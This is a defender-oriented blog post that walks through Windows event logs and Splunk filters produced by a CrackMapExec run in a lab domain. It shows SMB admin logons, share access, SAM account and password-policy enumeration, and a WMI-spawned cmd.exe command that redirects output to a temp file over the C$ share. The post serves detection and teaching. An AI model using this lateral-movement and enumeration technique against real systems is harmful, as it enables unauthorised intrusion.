Thursday, May 2, 2019

Having Fun with CrackMapExec - Log Analysis

In the previous post, we looked at crackmapexec from the perspective of the attacker. From the defender's perspective, let's first take a look at the logs which are generated when crackmapexec is executed on our network. As one of the devices is configured to have it logs forwarded to Splunk we are able to see that host reporting information about the initial scan. That also means, while multiple devices are on this network, not all are configured to forward their logs to a centralized logging solution. This is normally true for devices within a production network.

04/07/2019 11:08:41 PM
LogName=Microsoft-Windows-Sysmon/Operational
SourceName=Microsoft-Windows-Sysmon
EventCode=3
EventType=4
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
User=NOT_TRANSLATED
Sid=S-1-5-18
SidType=0
TaskCategory=Network connection detected (rule: NetworkConnect)
OpCode=Info
RecordNumber=12826
Keywords=None
Message=Network connection detected:
RuleName: 
UtcTime: 2019-04-08 06:08:40.639
ProcessGuid: {48be9e4e-df2a-5caa-0000-0010eb030000}
ProcessId: 4
Image: System
User: NT AUTHORITY\SYSTEM
Protocol: tcp
Initiated: false
SourceIsIpv6: false
SourceIp: 10.0.0.105
SourceHostname: SECNIK-2K19.securitynik.local
SourcePort: 445
SourcePortName: microsoft-ds
DestinationIsIpv6: false
DestinationIp: 10.0.0.100
DestinationHostname: 
DestinationPort: 34564
DestinationPortName:

From above, we see an example of Sysmon's reporting that a network connection was detected form the host at "10.00.0.105" communicating on source port "445" to destination IP "10.0.0.100" on port "34564".

As we look below, we see an example of the shares being accessed:

04/08/2019 06:19:50 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=43571
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access. 

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x5B3EF6

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  35710

Share Information:
 Share Name:  \\*\SYSVOL
 Share Path:  \??\C:\Windows\SYSVOL\sysvol
 Relative Target Name: LusqPJemAo

Access Request Information:
 Access Mask:  0x110080
 Accesses:  DELETE
    SYNCHRONIZE
    ReadAttributes

Access Check Results:
 DELETE: Granted by D:(A;;FA;;;BA)
    SYNCHRONIZE: Granted by D:(A;;0x1200a9;;;WD)
    ReadAttributes: Granted by D:(A;;0x1200a9;;;WD)


Let's take a better view of these shares being accessed via an image. Here is the filter I used in Splunk to see this data:

*  NOT "Files\\SplunkUniversalForwarder"  NOT "0:0:0:0:0:0:0:1"  NOT "127.0.0.1"  NOT "fe80:0:0:0:89f9:808e:8310:538e" NOT "Resource Assignment" NOT "224.0.0.252" "10.0.0.100" 
|  stats count by Source_Address,Source_Port,ComputerName,Account_Name,Logon_ID,Security_ID,TaskCategory,Share_Name,Share_Path,Relative_Target_Name


















As we look at the user enumeration, we see the first event where the firewall allowed the connection to the host at 10.0.0.105

04/09/2019 06:08:41 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5156
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Filtering Platform Connection
OpCode=Info
RecordNumber=53458
Keywords=Audit Success
Message=The Windows Filtering Platform has permitted a connection.

Application Information:
 Process ID:  4
 Application Name: System

Network Information:
 Direction:  Inbound
 Source Address:  10.0.0.100
 Source Port:  36662
 Destination Address: 10.0.0.105
 Destination Port:  445
 Protocol:  6

Filter Information:
 Filter Run-Time ID: 0
 Layer Name:  Receive/Accept
 Layer Run-Time ID: 44


After the firewall permit, we can see "Administrator" has logon successfully


04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logon
OpCode=Info
RecordNumber=53461
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Logon Information:
 Logon Type:  3
 Restricted Admin Mode: -
 Virtual Account:  No
 Elevated Token:  Yes

Impersonation Level:  Impersonation

New Logon:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC
 Linked Logon ID:  0x0
 Network Account Name: -
 Network Account Domain: -
 Logon GUID:  {00000000-0000-0000-0000-000000000000}

Process Information:
 Process ID:  0x0
 Process Name:  -

Network Information:
 Workstation Name: -
 Source Network Address: 10.0.0.100
 Source Port:  36662

Detailed Authentication Information:
 Logon Process:  NtLmSsp 
 Authentication Package: NTLM
 Transited Services: -
 Package Name (NTLM only): NTLM V2
 Key Length:  128

This event is generated when a logon session is created. It is generated on the computer that was accessed.

Next up we see the "Administrator" account with source IP address 10.0.0.100 accessing the share name "\\*\IPC$"

04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5140
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=File Share
OpCode=Info
RecordNumber=53462
Keywords=Audit Success
Message=A network share object was accessed.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  36662

Share Information:
 Share Name:  \\*\IPC$
 Share Path:  

Access Request Information:
 Access Mask:  0x1
 Accesses:  ReadData (or ListDirectory)

After the share has been accessed, we see below that permissions are being checked on the share


04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=53463
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  36662

Share Information:
 Share Name:  \\*\IPC$
 Share Path:  
 Relative Target Name: samr

Access Request Information:
 Access Mask:  0x3
 Accesses:  ReadData (or ListDirectory)
    WriteData (or AddFile)

Access Check Results:
 -

We next see a handle being requested to an object. Note this was handled by the "lsass.exe" process. From below, we can conclude the accounts on the system were being listed. The handle being requested can be either for an Active Directory object or a SAM object. Since this device is running Windows 2019, we will conclude this will be based on the Active Directory Object.


04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4661
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=SAM
OpCode=Info
RecordNumber=53464
Keywords=Audit Success
Message=A handle to an object was requested.

Subject :
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC

Object:
 Object Server: Security Account Manager
 Object Type: SAM_DOMAIN
 Object Name: DC=securitynik,DC=local
 Handle ID: 0x2555508d260

Process Information:
 Process ID: 0x22c
 Process Name: C:\Windows\System32\lsass.exe

Access Request Information:
 Transaction ID: {00000000-0000-0000-0000-000000000000}
 Accesses: DELETE
    READ_CONTROL
    WRITE_DAC
    WRITE_OWNER
    ReadPasswordParameters
    ReadOtherParameters
    WriteOtherParameters
    CreateUser
    CreateGlobalGroup
    CreateLocalGroup
    GetLocalGroupMembership
    ListAccounts

 Access Reasons:  -
 Access Mask: 0xF01FD
 Privileges Used for Access Check: -

 Properties: ---
 {19195a5a-6da0-11d0-afd3-00c04fd930c9}
 
DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
ReadPasswordParameters
ReadOtherParameters
WriteOtherParameters
CreateUser
CreateGlobalGroup
CreateLocalGroup
GetLocalGroupMembership

ListAccounts
  {c7407360-20bf-11d0-a768-00aa006e0529}
   {bf9679a4-0de6-11d0-a285-00aa003049e2}
   {bf9679a5-0de6-11d0-a285-00aa003049e2}
   {bf9679a6-0de6-11d0-a285-00aa003049e2}
   {bf9679bb-0de6-11d0-a285-00aa003049e2}
   {bf9679c2-0de6-11d0-a285-00aa003049e2}
   {bf9679c3-0de6-11d0-a285-00aa003049e2}
   {bf967a09-0de6-11d0-a285-00aa003049e2}
   {bf967a0b-0de6-11d0-a285-00aa003049e2}
  {b8119fd0-04f6-4762-ab7a-4986c76b3f9a}
   {bf967a34-0de6-11d0-a285-00aa003049e2}
   {bf967a33-0de6-11d0-a285-00aa003049e2}
   {bf9679c5-0de6-11d0-a285-00aa003049e2}
   {bf967a61-0de6-11d0-a285-00aa003049e2}
   {bf967977-0de6-11d0-a285-00aa003049e2}
   {bf96795e-0de6-11d0-a285-00aa003049e2}
   {bf9679ea-0de6-11d0-a285-00aa003049e2}
  {ab721a52-1e2f-11d0-9819-00aa0040529b}

 Restricted SID Count: 0

Similarly, we see yet another request for this handle. However, this time, note it is listing the groups. Note similar to above, additional information is being retrieved. The various property set GUID represents different items.


04/09/2019 06:08:42 PM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4661
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=SAM
OpCode=Info
RecordNumber=53465
Keywords=Audit Success
Message=A handle to an object was requested.

Subject :
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xA8C3DC

Object:
 Object Server: Security Account Manager
 Object Type: SAM_USER
 Object Name: S-1-5-21-4078604576-3869073289-8028338-500
 Handle ID: 0x2555508e5a0

Process Information:
 Process ID: 0x22c
 Process Name: C:\Windows\System32\lsass.exe

Access Request Information:
 Transaction ID: {00000000-0000-0000-0000-000000000000}
 Accesses: DELETE
    READ_CONTROL
    WRITE_DAC
    WRITE_OWNER
    ReadGeneralInformation
    ReadPreferences
    WritePreferences
    ReadLogon
    ReadAccount
    WriteAccount
    SetPassword (without knowledge of old password)
    ListGroups

 Access Reasons:  -
 Access Mask: 0xF01BF
 Privileges Used for Access Check: -
 Properties: ---
 {bf967aba-0de6-11d0-a285-00aa003049e2}

DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
ReadGeneralInformation
ReadPreferences
WritePreferences
ReadLogon
ReadAccount
WriteAccount
SetPassword (without knowledge of old password)

ListGroups
  {59ba2f42-79a2-11d0-9020-00c04fc2d3cf}
   {bf967938-0de6-11d0-a285-00aa003049e2}
   {5fd42471-1262-11d0-a060-00aa006c33ed}
   {bf9679e8-0de6-11d0-a285-00aa003049e2}
   {bf967a00-0de6-11d0-a285-00aa003049e2}
   {3e0abfd0-126a-11d0-a060-00aa006c33ed}
   {bf967a6a-0de6-11d0-a285-00aa003049e2}
   {bf967953-0de6-11d0-a285-00aa003049e2}
  {4c164200-20c0-11d0-a768-00aa006e0529}
   {bf967915-0de6-11d0-a285-00aa003049e2}
   {bf967a0a-0de6-11d0-a285-00aa003049e2}
   {bf967a68-0de6-11d0-a285-00aa003049e2}
   {bf967a6d-0de6-11d0-a285-00aa003049e2}
  {5f202010-79a5-11d0-9020-00c04fc2d4cf}
   {bf96792e-0de6-11d0-a285-00aa003049e2}
   {bf967985-0de6-11d0-a285-00aa003049e2}
   {bf967986-0de6-11d0-a285-00aa003049e2}
   {bf967996-0de6-11d0-a285-00aa003049e2}
   {bf967997-0de6-11d0-a285-00aa003049e2}
   {bf9679aa-0de6-11d0-a285-00aa003049e2}
   {bf9679ab-0de6-11d0-a285-00aa003049e2}
   {bf9679ac-0de6-11d0-a285-00aa003049e2}
   {bf967a05-0de6-11d0-a285-00aa003049e2}
   {bf9679a8-0de6-11d0-a285-00aa003049e2}
  {e48d0154-bcf8-11d1-8702-00c04fb96050}
   {bf967950-0de6-11d0-a285-00aa003049e2}
  {bc0ac240-79a9-11d0-9020-00c04fc2d4cf}
   {bf967991-0de6-11d0-a285-00aa003049e2}
  {ab721a53-1e2f-11d0-9819-00aa0040529b}
  {00299570-246d-11d0-a768-00aa006e0529}
  {7ed84960-ad10-11d0-8a92-00aa006e0529}

 Restricted SID Count: 0


Let's now look at what the logs look like to see how we might be able to discover when the request was made to enumerate the password policy


04/17/2019 08:11:15 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4661
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=SAM
OpCode=Info
RecordNumber=150020
Keywords=Audit Success
Message=A handle to an object was requested.



Subject :
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0x55E205

Object:
 Object Server: Security Account Manager
 Object Type: SAM_DOMAIN
 Object Name: DC=securitynik,DC=local
 Handle ID: 0x1fa0565e940

Process Information:
 Process ID: 0x234
 Process Name: C:\Windows\System32\lsass.exe

Access Request Information:
 Transaction ID: {00000000-0000-0000-0000-000000000000}
 Accesses: DELETE
    READ_CONTROL
    WRITE_DAC
    WRITE_OWNER
    ReadPasswordParameters
    ReadOtherParameters
    WriteOtherParameters
    CreateUser
    CreateGlobalGroup
    CreateLocalGroup
    GetLocalGroupMembership
    ListAccounts

   
 Access Reasons:  -
 Access Mask: 0xF01FD
 Privileges Used for Access Check: -
 Properties: ---
 {19195a5a-6da0-11d0-afd3-00c04fd930c9}

DELETE
READ_CONTROL
WRITE_DAC
WRITE_OWNER
ReadPasswordParameters
ReadOtherParameters
WriteOtherParameters
CreateUser
CreateGlobalGroup
CreateLocalGroup
GetLocalGroupMembership
ListAccounts
  {c7407360-20bf-11d0-a768-00aa006e0529}
   {bf9679a4-0de6-11d0-a285-00aa003049e2}
   {bf9679a5-0de6-11d0-a285-00aa003049e2}
   {bf9679a6-0de6-11d0-a285-00aa003049e2}
   {bf9679bb-0de6-11d0-a285-00aa003049e2}
   {bf9679c2-0de6-11d0-a285-00aa003049e2}
   {bf9679c3-0de6-11d0-a285-00aa003049e2}
   {bf967a09-0de6-11d0-a285-00aa003049e2}
   {bf967a0b-0de6-11d0-a285-00aa003049e2}
  {b8119fd0-04f6-4762-ab7a-4986c76b3f9a}
   {bf967a34-0de6-11d0-a285-00aa003049e2}
   {bf967a33-0de6-11d0-a285-00aa003049e2}
   {bf9679c5-0de6-11d0-a285-00aa003049e2}
   {bf967a61-0de6-11d0-a285-00aa003049e2}
   {bf967977-0de6-11d0-a285-00aa003049e2}
   {bf96795e-0de6-11d0-a285-00aa003049e2}
   {bf9679ea-0de6-11d0-a285-00aa003049e2}
  {ab721a52-1e2f-11d0-9819-00aa0040529b}

 Restricted SID Count: 0


The above is reflective of the password policy being requested (along with other domain parameters). See the reference section for their link to translate the values.

Let's now see what the communication looks like when crackmapexec runs a powershell command.

To help us understand the connections which are created, let's take a look at some statistics via Splunk. Specifically, along with some important information, let's identify the different logon sessions. We can track these via the "Logon_ID" field as shown below.


* NOT("splunk" OR "activedirectory.webservices.exe" OR "::1" OR "127.0.0.1" OR Protocol=17) 
|  stats count by Source_Address,Source_Port,Logon_ID,Account_Name,Share_Name

Source_Address   Source_Port Logon_ID Account_Name Share_Name count
10.0.0.100   53494  0xB48A3E Administrator \\*\C$  21
10.0.0.100   53496  0xB48A64 Administrator \\*\IPC$ 2
fe80::89f9:808e:8310:538e 56096  0xB4D870 SECNIK-2K19$ \\*\SYSVOL 2
fe80::89f9:808e:8310:538e 56100  0xB5543B SECNIK-2K19$ \\*\SYSVOL 3
fe80::89f9:808e:8310:538e 56103  0x3E4  SECNIK-2K19$ \\*\IPC$ 1

From the information above, it looks like the first session is the busiest. Let's look into that session to see what we can figure out.

Using a filter which focuses in on Logon_ID "0xB48A3E", we see the following:

04/18/2019 01:32:43 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logon
OpCode=Info
RecordNumber=172526
Keywords=Audit Success
Message=An account was successfully logged on.


Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Logon Information:
 Logon Type:  3
 Restricted Admin Mode: -
 Virtual Account:  No
 Elevated Token:  Yes

Impersonation Level:  Impersonation

New Logon:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E
 Linked Logon ID:  0x0
 Network Account Name: -
 Network Account Domain: -
 Logon GUID:  {00000000-0000-0000-0000-000000000000}

Process Information:
 Process ID:  0x0
 Process Name:  -

Network Information:
 Workstation Name: -
 Source Network Address: 10.0.0.100
 Source Port:  53494

Detailed Authentication Information:
 Logon Process:  NtLmSsp 
 Authentication Package: NTLM
 Transited Services: -
 Package Name (NTLM only): NTLM V2
 Key Length:  128

Above we see user "Administrator" logon successfully from "10.0.0.100:53494" and was assigned the logon ID of "0xB48A3E".

We then see below that the share name "\\*\C$" was accessed via a read (or list directory) action.


04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5140
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=File Share
OpCode=Info
RecordNumber=172553
Keywords=Audit Success
Message=A network share object was accessed.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  53494

Share Information:
 Share Name:  \\*\C$
 Share Path:  \??\C:\

Access Request Information:
 Access Mask:  0x1
 Accesses:  ReadData (or ListDirectory)

Next up we see the below the object "Windows\Temp\kJpSGP" was checked to see if ReadData access can be granted to the target "Windows\Temp\kJpSGP"


04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=172554
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  53494

Share Information:
 Share Name:  \\*\C$
 Share Path:  \??\C:\
 Relative Target Name: Windows\Temp\kJpSGP

Access Request Information:
 Access Mask:  0x1
 Accesses:  ReadData (or ListDirectory)
    
Access Check Results:


Next up below, we see yet another attempt to check whether access can be granted. This time to "Windows\Temp\kJpSGP"


04/18/2019 01:32:45 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=172568
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  53494

Share Information:
 Share Name:  \\*\C$
 Share Path:  \??\C:\
 Relative Target Name: Windows\Temp\kJpSGP

Access Request Information:
 Access Mask:  0x1
 Accesses:  ReadData (or ListDirectory)
    
Access Check Results:

Following the event above, we see below that a check was done to see if the necessary permissions exists to delete the file above.


04/18/2019 01:32:45 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=172570
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Network Information: 
 Object Type:  File
 Source Address:  10.0.0.100
 Source Port:  53494

Share Information:
 Share Name:  \\*\C$
 Share Path:  \??\C:\
 Relative Target Name: Windows\Temp\kJpSGP

Access Request Information:
 Access Mask:  0x10080
 Accesses:  DELETE
    ReadAttributes

Access Check Results:

Similar to above, there were a number of these checks to see if the necessary permissions were in place. However, in the interest of space and time I choose to leave them out of this analysis.

Ultimately, this account logged off as shown below.


04/18/2019 01:32:47 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=172610
Keywords=Audit Success
Message=An account was logged off.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A3E

Logon Type:   3

Let's now see what is going on with the logon ID "0xB48A64" which is associated with IP 10.0.0.100.


04/18/2019 01:32:43 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logon
OpCode=Info
RecordNumber=172530
Keywords=Audit Success
Message=An account was successfully logged on.


Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Logon Information:
 Logon Type:  3
 Restricted Admin Mode: -
 Virtual Account:  No
 Elevated Token:  Yes

Impersonation Level:  Impersonation

New Logon:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A64
 Linked Logon ID:  0x0
 Network Account Name: -
 Network Account Domain: -
 Logon GUID:  {00000000-0000-0000-0000-000000000000}

Process Information:
 Process ID:  0x0
 Process Name:  -

Network Information:
 Workstation Name: -
 Source Network Address: 10.0.0.100
 Source Port:  53496

Detailed Authentication Information:
 Logon Process:  NtLmSsp 
 Authentication Package: NTLM
 Transited Services: -
 Package Name (NTLM only): NTLM V2
 Key Length:  128

Above we see the logon which is ultimately followed by a logoff as shown below.


04/18/2019 01:32:47 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4634
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logoff
OpCode=Info
RecordNumber=172609
Keywords=Audit Success
Message=An account was logged off.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48A64

Logon Type:   3

At this point my conclusion was that we missed something in our analysis. This has to be because of our initial filter. While that filter helped us to detect some activity, it did not help us to find where the actual powershell command was executed. Let's step back for a second and look between the logon and logoff time above to see if we can get better insights into what might have transpired during that time.

As I scroll through the logs, I noticed a logon ID which was not caught by my previous filter. This new Logon ID is "0xB48AC1". You may also notice that the port "10.0.0.100:37794" was not in our filter above. Maybe we missed something. Hopefully my oversight above helps you to understand how easy it is to miss important evidence.

Below we see that account was able to successfully logon


04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4624
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Logon
OpCode=Info
RecordNumber=172543
Keywords=Audit Success
Message=An account was successfully logged on.

Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Logon Information:
 Logon Type:  3
 Restricted Admin Mode: -
 Virtual Account:  No
 Elevated Token:  Yes

Impersonation Level:  Impersonation

New Logon:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1
 Linked Logon ID:  0x0
 Network Account Name: -
 Network Account Domain: -
 Logon GUID:  {00000000-0000-0000-0000-000000000000}

Process Information:
 Process ID:  0x0
 Process Name:  -

Network Information:
 Workstation Name: -
 Source Network Address: 10.0.0.100
 Source Port:  37794

Detailed Authentication Information:
 Logon Process:  NtLmSsp 
 Authentication Package: NTLM
 Transited Services: -
 Package Name (NTLM only): NTLM V2
 Key Length:  128

Now that we have this new Logon ID of "0xB48AC1", we can set a filter to focus on the activity performed by this Logon ID. Let's push ahead to see what we can find of relevance.

Immediately after logon, we see below the "Administrator" account using Logon ID "0xB48AC1" creating a new process for "cmd.exe". As we look at the "Process Command Line" below we see interestingly that the file "Windows\Temp\kJpSGP" which we referenced above and for which permissions checks were being done is being used. I find this command line interesting, so let's break it down.

Basically below, arguments to "cmd.exe" are as follows:
/Q - Turns echo off
/c - Carries out the command specified by string and then terminates
cd \ - says to switch to the root directory in this case C:\ more than likely
1> - take anything from the output of the previous command and send it to ....
... \\127.0.0.1\C$\Windows\Temp\kJpSGP - The file to which the contents of the redirection should be sent if anything
2>&1 - Take any error which may occur and send it to where standard out is going which is to the file "kJpSGP"

Now that we know what the command is about, let's press ahead.


04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=172550
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-20
 Account Name:  SECNIK-2K19$
 Account Domain:  SECURITYNIK
 Logon ID:  0x3E4

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Process Information:
 New Process ID:  0xe00
 New Process Name: C:\Windows\System32\cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x12cc
 Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
 Process Command Line: cmd.exe /Q /c cd \ 1> \\127.0.0.1\C$\Windows\Temp\kJpSGP 2>&1

We then see the "cmd.exe" process above, now creates below the "conhost.exe" process.

04/18/2019 01:32:44 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=172551
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  -
 Account Domain:  -
 Logon ID:  0x0

Process Information:
 New Process ID:  0x1040
 New Process Name: C:\Windows\System32\conhost.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0xe00
 Creator Process Name: C:\Windows\System32\cmd.exe
 Process Command Line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

We next see below on the localhost (127.0.0.1), some activity being performed by the logon ID "0xB48AC1". Specifically we see attempts to check to see whether or not there is enough permission to "The right to read the information in the object's security description", "The right to use the object for synchronization", "the right to write data to the file", "the right to append data to the file", "The right to write extended file attributes", "The right to read file attributes" and finally "The right to write file attributes."

04/18/2019 01:32:45 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=5145
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Detailed File Share
OpCode=Info
RecordNumber=172566
Keywords=Audit Success
Message=A network share object was checked to see whether client can be granted desired access.

Subject:
 Security ID:  S-1-5-21-4078604576-3869073289-8028338-500
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Network Information: 
 Object Type:  File
 Source Address:  127.0.0.1
 Source Port:  56094

Share Information:
 Share Name:  \\*\C$
 Share Path:  \??\C:\
 Relative Target Name: Windows\Temp\kJpSGP

Access Request Information:
 Access Mask:  0x120196
 Accesses:  READ_CONTROL
    SYNCHRONIZE
    WriteData (or AddFile)
    AppendData (or AddSubdirectory or CreatePipeInstance)
    WriteEA
    ReadAttributes
    WriteAttributes

Access Check Results:


Eventually, after seeing some additional activity (which I've excluded for brevity), we see a powershell script being executed by the "cmd.exe" process. Please note, this is not the same "cmd.exe" from above, but this activity is all related. It is just that another "cmd.exe" was created and I did not see the point with going back to show information which was already shown above. If you have any concerns about this, do feel free to drop me a line.

As we look at the command line below, we see what seems to be powershell being executed. However, we are unable to read the contents at this time.


04/18/2019 01:32:45 AM
LogName=Security
SourceName=Microsoft Windows security auditing.
EventCode=4688
EventType=0
Type=Information
ComputerName=SECNIK-2K19.securitynik.local
TaskCategory=Process Creation
OpCode=Info
RecordNumber=172584
Keywords=Audit Success
Message=A new process has been created.

Creator Subject:

 Security ID:  S-1-5-20
 Account Name:  SECNIK-2K19$
 Account Domain:  SECURITYNIK
 Logon ID:  0x3E4

Target Subject:
 Security ID:  S-1-0-0
 Account Name:  Administrator
 Account Domain:  SECURITYNIK
 Logon ID:  0xB48AC1

Process Information:
 New Process ID:  0xa74
 New Process Name: C:\Windows\System32\cmd.exe
 Token Elevation Type: %%1936
 Mandatory Label:  S-1-16-12288
 Creator Process ID: 0x12cc
 Creator Process Name: C:\Windows\System32\wbem\WmiPrvSE.exe
